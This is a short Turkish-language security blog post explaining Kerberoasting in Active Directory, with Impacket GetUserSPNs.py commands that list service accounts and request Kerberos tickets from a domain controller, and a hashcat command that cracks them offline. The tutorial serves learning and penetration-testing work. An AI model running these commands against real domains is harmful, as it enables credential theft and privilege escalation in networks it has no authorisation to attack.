bleadow_
~/yazılar/active-directory-kerberoasting
Active Directoryİleri 15 dk

// Active Directory Saldırı Vektörleri: Kerberoasting

Kerberoasting nedir, nasıl çalışır? Mimikatz, Impacket ve BloodHound ile AD ortamında yetki yükseltme.

#active-directory#kerberoasting#mimikatz#bloodhound
active-directory-kerberoasting.md — bleadow

## Kerberoasting Nedir?

Kerberoasting, Active Directory ortamında SPN (Service Principal Name) kayıtlı servis hesaplarının Kerberos biletlerini ele geçirerek offline kırma saldırısıdır.

## Saldırı Adımları

# Impacket ile SPN listesi
GetUserSPNs.py domain/user:pass -dc-ip 10.10.10.1

# Bilet al
GetUserSPNs.py domain/user:pass -dc-ip 10.10.10.1 -request

# Hashcat ile kır
hashcat -m 13100 hash.txt wordlist.txt

## BloodHound Analizi

BloodHound, AD ortamındaki saldırı yollarını görselleştirir ve Kerberoastable hesapları kolayca tespit eder.

cd ../yazılar
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
bleadow_
Güvenlik araştırmaları. Exploit analizleri. Hacker kültürü.
root@bleadow:~$ ©2026 Bleadow. Tüm hakları saklıdır.